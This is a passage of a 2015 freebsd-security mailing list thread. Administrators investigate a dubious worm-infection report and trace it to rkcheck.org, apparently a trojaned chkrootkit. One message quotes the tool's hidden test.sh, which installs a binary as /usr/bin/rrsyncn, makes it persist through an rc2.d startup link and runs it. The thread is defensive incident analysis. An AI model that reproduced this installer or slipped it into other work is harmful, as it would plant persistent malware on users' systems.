Message-ID: <86k2z5yc03.fsf@gly.ftfl.ca> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:25:36 -0000 Philip Jocks writes: > are those the only lines they sent you? Weirdly, we got a report like this today > as well with the first (out of 8) sample line showing the exact time stamp > (23/Feb/2015:14:53:37 +0100) and the exact query string > (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it > a bit strange to be a coincidence. There is a webserver running in a jail on the > reported IP address, but I can't find any log lines on our side that could be > related. > We asked the email.it folks for details, but haven't heard back from them yet. > > Philip Interesting. Yes, they sent nearly the same line about 8 times with the timestamps a second or two apart. What other daemons are you running on that host? Something other than the webserver could be compromised. Please share if you hear anything from email.it. Joseph From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:25:42 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 95904DED for ; Wed, 25 Feb 2015 20:25:42 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 4F9A021B for ; Wed, 25 Feb 2015 20:25:42 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id 28DA72D64125; Wed, 25 Feb 2015 21:16:50 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id U3Fv42_I4JiH; Wed, 25 Feb 2015 21:16:47 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id C61962D631A7; Wed, 25 Feb 2015 21:16:47 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <86vbipycyc.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 21:16:48 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> To: Joseph Mingrone X-Mailer: Apple Mail (2.1993) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:25:42 -0000 > Am 25.02.2015 um 21:04 schrieb Joseph Mingrone : >=20 > Jung-uk Kim writes: >=20 >> On 02/25/2015 14:41, Joseph Mingrone wrote: >>> This morning when I arrived at work I had this email from my=20 >>> university's IT department (via email.it) informing me that my host >>> was infected and spreading a worm. >>>=20 >>> "Based on the logs fingerprints seems that your server is infected >>> by the following worm: Net-Worm.PHP.Mongiko.a" >>>=20 >>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST=20 >>> /?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7 >>> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" >>>=20 >>> Despite the surprising name, I don't see any evidence that it's >>> related to php. I did remove php, because I don't really need it. >>> I've included my /etc/rc.conf below. pkg audit doesn't show any=20 >>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show >>> much. I've run chkrootkit, netstat/sockstat and I don't see >>> anything suspicious and I plan to finally put some reasonable >>> firewall rules on this host. >>>=20 >>> Do you have any suggestions? Should I include any other >>> information here? >> ... >>=20 >> I found this: >>=20 >> = http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mon= giko-trying-to-do >>=20 >> Jung-uk Kim >=20 > Yeah, I saw that as well. I wouldn't be concerned if this was hitting > my web server, but the key difference here is that my IP is the > apparently the source in this case. >=20 > Joseph are those the only lines they sent you? Weirdly, we got a report like = this today as well with the first (out of 8) sample line showing the = exact time stamp (23/Feb/2015:14:53:37 +0100) and the exact query string = (/?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7) = which makes it a bit strange to be a coincidence. There is a webserver = running in a jail on the reported IP address, but I can't find any log = lines on our side that could be related. We asked the email.it folks for details, but haven't heard back from = them yet. Philip= From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:28:36 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 3CD06F8D for ; Wed, 25 Feb 2015 20:28:36 +0000 (UTC) Received: from tau.lfms.nl (tau.lfms.nl [93.189.130.30]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id D9065279 for ; Wed, 25 Feb 2015 20:28:34 +0000 (UTC) Received: from sim.dt.lfms.nl (dt.lfms.nl [83.84.86.53]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by tau.lfms.nl (Postfix) with ESMTPS id 42C7A89285 for ; Wed, 25 Feb 2015 21:19:47 +0100 (CET) Received: from [192.168.130.112] (borax.dt.lfms.nl [192.168.130.112]) (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by sim.dt.lfms.nl (Postfix) with ESMTPS id 0CF309C09085 for ; Wed, 25 Feb 2015 21:19:47 +0100 (CET) From: Walter Hop Message-Id: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> Mime-Version: 1.0 (Mac OS X Mail 8.2 \(2070.6\)) Subject: Re: has my 10.1-RELEASE system been compromised Date: Wed, 25 Feb 2015 21:19:46 +0100 References: <864mq9zsmm.fsf@gly.ftfl.ca> To: freebsd-security@freebsd.org In-Reply-To: <864mq9zsmm.fsf@gly.ftfl.ca> X-Mailer: Apple Mail (2.2070.6) Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.18-1 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:28:36 -0000 On 25 Feb 2015, at 20:41, Joseph Mingrone wrote: >=20 > "Based on the logs fingerprints seems that your server is infected by > the following worm: Net-Worm.PHP.Mongiko.a" >=20 > my ip here - - [23/Feb/2015:14:53:37 +0100] "POST > /?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7 = HTTP/1.1" > 200 429 "-" "Net-=20 > Worm.PHP.Mongiko.a=E2=80=9D I haven=E2=80=99t heard of this worm, although this type of request is = seen more often: = https://www.google.nl/search?q=3Dpost%20%22cmd%3Dinfo%26key%22 = If this traffic is originating from your system, and you were running = PHP, I=E2=80=99d say it=E2=80=99s probably most likely that some PHP = script/application on your host was compromised. Were you running stuff = like phpMyAdmin, Wordpress or Drupal that might not have been updated = too often? Often in such a compromise, the attacker leaves traces in the = filesystem, like executable scripts or temp files. Try to look for new = files which are owned by the webserver or fastcgi process, see if you = find some surprises. Example: # touch -t 201501010000 foo # find / -user www -newer foo If you don=E2=80=99t find anything, look back a little further. Hopefully you will find a clue in this way. --=20 Walter Hop | PGP key: https://lifeforms.nl/pgp From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:31:21 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id EFE611B2 for ; Wed, 25 Feb 2015 20:31:21 +0000 (UTC) Received: from mail-qa0-x233.google.com (mail-qa0-x233.google.com [IPv6:2607:f8b0:400d:c00::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 9969F364 for ; Wed, 25 Feb 2015 20:31:21 +0000 (UTC) Received: by mail-qa0-f51.google.com with SMTP id i13so4609817qae.10 for ; Wed, 25 Feb 2015 12:31:20 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ftfl.ca; s=google; h=from:to:cc:subject:references:date:in-reply-to:message-id :user-agent:mime-version:content-type; bh=60SCWh8IKdUJabU3KnBPo/tvZU6p95Yen9Yh3GI8WW4=; b=NU/apMH8UtOMQKZvMGnZ6Xj7KPLOLdd6agOaKoYy03ilMKD8L43kkjgrfJJ46WQcIm eXNj25WB511Sub7Z6GNBQkkbX3Xyos/+LaoMOgR9K5Bu0AOJDbQTKr8amdQssTJVVqD+ ha0+rxs7TU8dDVK5Ra9eQoL7/mmKZmewcX4xU= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:references:date:in-reply-to :message-id:user-agent:mime-version:content-type; bh=60SCWh8IKdUJabU3KnBPo/tvZU6p95Yen9Yh3GI8WW4=; b=MhlDCy0dcuph8kfjfGiKqC+ebt2cS5DVDSsQh0nXss2yEdmMWgWTJh/ek8V9F0Oayk IkMnLk/p8P8DmW/XmccTKZOeZYlUNh6au9QrDS92mwv2MPcj+FSGZzGvlnWj7EEu12No yAwPILt0CU8FhV3wi5Jf/Yv6lJ0E6HJVgH86QtJd6K3PmNnI9OoubI+V5lNwiEqGfn2p yInZHTN3GxJCo4FYznUNWDBfMu8VA1rDzWktvVzu+IkGkft8lEVuZC7/SP0NdXtko2B7 aKaMNPqzrDfuqK74ZqR+GsM5FG6lxqQNgzwVHOsIGOgzhEWn0Zvc4glveAex5YUxsL3p 4Fww== X-Gm-Message-State: ALoCoQnkSb/RT8S6eceWEq/6S/k3UFkQNcwbFOmOsUaBt2mBGpDxcO9BPoz9QGXSXS3ZDr/R8H/j X-Received: by 10.229.64.67 with SMTP id d3mr11080513qci.9.1424896280805; Wed, 25 Feb 2015 12:31:20 -0800 (PST) Received: from gly.ftfl.ca.ftfl.ca (Dynamic34-29.Dynamic.Dal.Ca. [129.173.34.203]) by mx.google.com with ESMTPSA id c102sm25552704qge.41.2015.02.25.12.31.19 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 25 Feb 2015 12:31:19 -0800 (PST) From: Joseph Mingrone To: Matt Donovan Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 16:31:18 -0400 In-Reply-To: (Matt Donovan's message of "Wed, 25 Feb 2015 14:24:04 -0600") Message-ID: <86fv9tybqh.fsf@gly.ftfl.ca> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain Cc: freebsd-security , Jung-uk Kim X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:31:22 -0000 Matt Donovan writes: > On Feb 25, 2015 2:05 PM, "Joseph Mingrone" wrote: >> >> Jung-uk Kim writes: >> >> > On 02/25/2015 14:41, Joseph Mingrone wrote: >> >> This morning when I arrived at work I had this email from my >> >> university's IT department (via email.it) informing me that my host >> >> was infected and spreading a worm. >> >> >> >> "Based on the logs fingerprints seems that your server is infected >> >> by the following worm: Net-Worm.PHP.Mongiko.a" >> >> >> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST >> >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 >> >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" >> >> >> >> Despite the surprising name, I don't see any evidence that it's >> >> related to php. I did remove php, because I don't really need it. >> >> I've included my /etc/rc.conf below. pkg audit doesn't show any >> >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show >> >> much. I've run chkrootkit, netstat/sockstat and I don't see >> >> anything suspicious and I plan to finally put some reasonable >> >> firewall rules on this host. >> >> >> >> Do you have any suggestions? Should I include any other >> >> information here? >> > ... >> > >> > I found this: >> > >> > > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do >> > >> > Jung-uk Kim >> >> Yeah, I saw that as well. I wouldn't be concerned if this was hitting >> my web server, but the key difference here is that my IP is the >> apparently the source in this case. >> >> Joseph >> _______________________________________________ > Hello, > > First run sockstat to see any connections that you do not recognize. This > will help narrow the scope. Usually this is installed though a compromised > web application as well such as a password compromise or a vulnerability. > As several malware when doing ps looks like a different program running. I don't see anything out of the ordinary. All those connections are intended. % sockstat -cL4 USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS jrm lr 28536 7 tcp4 129.173.34.203:55957 8.8.8.8:53 jrm emacs-24.4 90922 24 tcp4 129.173.34.203:22783 80.91.229.13:119 znc znc 664 5 tcp4 129.173.34.203:11133 91.217.189.42:6697 znc znc 664 7 tcp4 129.173.34.203:57772 107.170.156.130:6697 znc znc 664 8 tcp4 129.173.34.203:56390 206.12.19.242:6697 znc znc 664 9 tcp4 129.173.34.203:11137 24.244.24.20:6697 From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:34:25 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 9CE8B2C9 for ; Wed, 25 Feb 2015 20:34:25 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 56229393 for ; Wed, 25 Feb 2015 20:34:25 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id A5DE22D64125; Wed, 25 Feb 2015 21:34:23 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id e8UqxAuodkkH; Wed, 25 Feb 2015 21:34:20 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id AB2992D631A7; Wed, 25 Feb 2015 21:34:20 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <86k2z5yc03.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 21:34:21 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> To: Joseph Mingrone X-Mailer: Apple Mail (2.1993) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:34:25 -0000 > Am 25.02.2015 um 21:25 schrieb Joseph Mingrone : >=20 > Philip Jocks writes: >> are those the only lines they sent you? Weirdly, we got a report like = this today >> as well with the first (out of 8) sample line showing the exact time = stamp >> (23/Feb/2015:14:53:37 +0100) and the exact query string >> (/?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7) = which makes it >> a bit strange to be a coincidence. There is a webserver running in a = jail on the >> reported IP address, but I can't find any log lines on our side that = could be >> related. >> We asked the email.it folks for details, but haven't heard back from = them yet. >>=20 >> Philip >=20 > Interesting. Yes, they sent nearly the same line about 8 times with = the timestamps a > second or two apart. What other daemons are you running on that host? > Something other than the webserver could be compromised. >=20 > Please share if you hear anything from email.it. >=20 > Joseph it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org which was registered a few days ago and looks like a = tampered version of chkrootkit. I hope, nobody installed it anywhere, it = seems to execute rkcheck/tests/.unit/test.sh which contains=20 #!/bin/bash cp tests/.unit/test /usr/bin/rrsyncn chmod +x /usr/bin/rrsyncn rm -fr /etc/rc2.d/S98rsyncn ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn /usr/bin/rrsyncn exit That doesn't look like something you'd want on your box... Cheers, Philip From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:41:26 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 09E764FA for ; Wed, 25 Feb 2015 20:41:26 +0000 (UTC) Received: from mail-qc0-x233.google.com (mail-qc0-x233.google.com [IPv6:2607:f8b0:400d:c01::233]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id A7A3F3F9 for ; Wed, 25 Feb 2015 20:41:25 +0000 (UTC) Received: by qcwb13 with SMTP id b13so5119516qcw.6 for ; Wed, 25 Feb 2015 12:41:24 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ftfl.ca; s=google; h=from:to:cc:subject:references:date:in-reply-to:message-id :user-agent:mime-version:content-type; bh=Jgf+BsrDJ42+aUszNJ0uqiztO96ODWhkN+DQHhDjYYM=; b=bDiaaaLPtYUpLKrn7KlmpbBk/NU/OzamRWNaPBlRiCeqkTxyamMdKVvXCQNlhp7krq DXQ9AlBTv9C3IGsR4E7yEXuxNYftNktA/p3QWRL+lsCUsnYdhMyXDM/6w61zAoIy5xxQ mNB8t2xhmhL741TPPfdeBrZaFI2WCaFDC/bIk= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:from:to:cc:subject:references:date:in-reply-to :message-id:user-agent:mime-version:content-type; bh=Jgf+BsrDJ42+aUszNJ0uqiztO96ODWhkN+DQHhDjYYM=; b=jGfMOhqZQxyaHWf15LCLS/Caz3H0U/hoPWPn2io85AAAh5lroZ0c2+W/nKYp4t8LC4 as4NmBqUm8lT69fT0X3vDMHDBuhXE2DegKOgeaicCiCi1e/zK0vjcuLQdf4tzd0DVvFP Ba2dG7+zEcT9IIILcLxQI7vJ6RZ34lpouGE3zV6a3+dTuCXom85YiB1eV6xqYNxbrcVO bHIKYq/Gc6MlHExamJUdkh9GOjdbhsFDeIuHLPfD8BF/XWH4PKTnOEjn2wxKGoi/ikOX BcmKY/dbDGS/uHjmiQMG7WQmsDwHvvqzUMTt8bej38btYyPETfnmk4pDyMlz3s9pWzE8 n0mg== X-Gm-Message-State: ALoCoQlcrOiVZdXbglN/LKLhqvBy+7N/VMwGhwcgkHjuS2sdNvo/uX7cilX/OYy+LCThIQHZUgOn X-Received: by 10.140.43.199 with SMTP id e65mr10711854qga.34.1424896884729; Wed, 25 Feb 2015 12:41:24 -0800 (PST) Received: from gly.ftfl.ca.ftfl.ca (Dynamic34-29.Dynamic.Dal.Ca. [129.173.34.203]) by mx.google.com with ESMTPSA id k47sm6262163qgd.2.2015.02.25.12.41.21 (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 25 Feb 2015 12:41:22 -0800 (PST) From: Joseph Mingrone To: Philip Jocks Subject: Re: has my 10.1-RELEASE system been compromised References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> Date: Wed, 25 Feb 2015 16:41:19 -0400 In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100") Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:41:26 -0000 Philip Jocks writes: > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which > was registered a few days ago and looks like a tampered version of chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box... I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Joseph From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 20:56:22 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id AD58EA14 for ; Wed, 25 Feb 2015 20:56:22 +0000 (UTC) Received: from briareus.schulte.org (briareus.schulte.org [198.204.225.190]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 7A4BB82A for ; Wed, 25 Feb 2015 20:56:22 +0000 (UTC) Received: from briareus.schulte.org (localhost [127.0.0.1]) by briareus.schulte.org (Postfix) with ESMTP id 3DE6B40801; Wed, 25 Feb 2015 14:55:44 -0600 (CST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=schulte.org; h=from:to :cc:subject:date:message-id:references:in-reply-to:content-type :content-id:content-transfer-encoding:mime-version; s=20130123; i=christopher@schulte.org; bh=roSBhIIZAh3Y3D2BiT41J6erS1gFOeVIl RTzPAK6A1I=; b=ecMyNG7cz+ouWLFexlzlpbEC6OQAiVL/QRjuJlY5fpiPY23FQ mQRxfpVT3SM8LCWSNYG2sjWhp8MvwmnGimEKMCW/OpW1DLxk3bDbu60Tx0rydJf1 63MVFNY9fU8IeZSE4r80AepjfR7xeTuEQls0mw6RfHJLS2wceyuwxZ2s8I= x-schulte-info1: relayed through postfix client submission Received: from exchange2013.windows2012r2.schulte.org (10.200.1.188) by exchange2013.windows2012r2.schulte.org (10.200.1.188) with Microsoft SMTP Server (TLS) id 15.0.847.32; Wed, 25 Feb 2015 14:55:43 -0600 Received: from exchange2013.windows2012r2.schulte.org ([fe80::695c:2eae:3d60:8cd7]) by exchange2013.windows2012r2.schulte.org ([fe80::695c:2eae:3d60:8cd7%16]) with mapi id 15.00.0847.030; Wed, 25 Feb 2015 14:55:43 -0600 From: Christopher Schulte To: Philip Jocks Subject: Re: has my 10.1-RELEASE system been compromised Thread-Topic: has my 10.1-RELEASE system been compromised Thread-Index: AQHQUTRPlHoaFq2Xw0CAp6YGLFOGpZ0CLdyA//+cf1iAAAW0kIAAZvyAgAAF9wA= Date: Wed, 25 Feb 2015 20:55:43 +0000 Message-ID: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: x-schulteexchange-note1: origination IP removed Content-Type: text/plain; charset="utf-8" Content-ID: <52773E1C00FB4743876BF5D4200C3971@windows2012r2.schulte.org> Content-Transfer-Encoding: base64 MIME-Version: 1.0 X-Virus-Scanned: ClamAV using ClamSMTP Cc: Joseph Mingrone , "freebsd-security@freebsd.org" X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 20:56:22 -0000 DQo+IE9uIEZlYiAyNSwgMjAxNSwgYXQgMjozNCBQTSwgUGhpbGlwIEpvY2tzIDxwamxpc3RzQG5l dHprb21tdW5lLmNvbT4gd3JvdGU6DQo+IA0KPiBpdCBmZWx0IHByZXR0eSBzY2FtbXkgdG8gbWUs IGdvb2dsaW5nIGZvciB0aGUgIndvcm0iIGdvdCBtZSB0byBya2NoZWNrLm9yZyB3aGljaCB3YXMg cmVnaXN0ZXJlZCBhIGZldyBkYXlzIGFnbyBhbmQgbG9va3MgbGlrZSBhIHRhbXBlcmVkIHZlcnNp b24gb2YgY2hrcm9vdGtpdC4gSSBob3BlLCBub2JvZHkgaW5zdGFsbGVkIGl0IGFueXdoZXJlLCBp dCBzZWVtcyB0byBleGVjdXRlIHJrY2hlY2svdGVzdHMvLnVuaXQvdGVzdC5zaCB3aGljaCBjb250 YWlucyANCj4gDQo+ICMhL2Jpbi9iYXNoDQo+IA0KPiBjcCB0ZXN0cy8udW5pdC90ZXN0IC91c3Iv YmluL3Jyc3luY24NCj4gY2htb2QgK3ggL3Vzci9iaW4vcnJzeW5jbg0KPiBybSAtZnIgL2V0Yy9y YzIuZC9TOThyc3luY24NCj4gbG4gLXMgL3Vzci9iaW4vcnJzeW5jbiAvZXRjL3JjMi5kL1M5OHJz eW5jbg0KPiAvdXNyL2Jpbi9ycnN5bmNuDQo+IGV4aXQNCj4gDQo+IFRoYXQgZG9lc24ndCBsb29r IGxpa2Ugc29tZXRoaW5nIHlvdSdkIHdhbnQgb24geW91ciBib3jigKYNCg0KSSBmaWxlZCBhIHJl cG9ydCB3aXRoIEdvb2dsZSBhYm91dCB0aGF0IGRvbWFpbiAoR29vZ2xlIFNhZmUgQnJvd3Npbmcp LCBicmllZmx5IGRlc2NyaWJpbmcgd2hhdOKAmXMgYmVlbiByZWNvdW50ZWQgaGVyZSBvbiB0aGlz IHRocmVhZC4gIEl0IHNlZW1zIHF1aXRlIHN1c3BpY2lvdXMsIGFncmVlZC4NCg0KSGFzIGFueW9u ZSBzdGFydGVkIGFuIGFuYWx5c2lzIG9mIHRoZSBycnN5bmNuIGJpbmFyeT8gIFRoZSBsYXN0IGZl dyBsaW5lcyBvZiBhIHNpbXBsZSBzdHJpbmcgZHVtcCBhcmUgaW50ZXJlc3RpbmfigKYgdGFrZSBu b3RlIHdoYXQgbG9va3MgdG8gYmUgYW4gSVAgYWRkcmVzcyBvZiA5NS4yMTUuNDQuMTk1Lg0KDQov 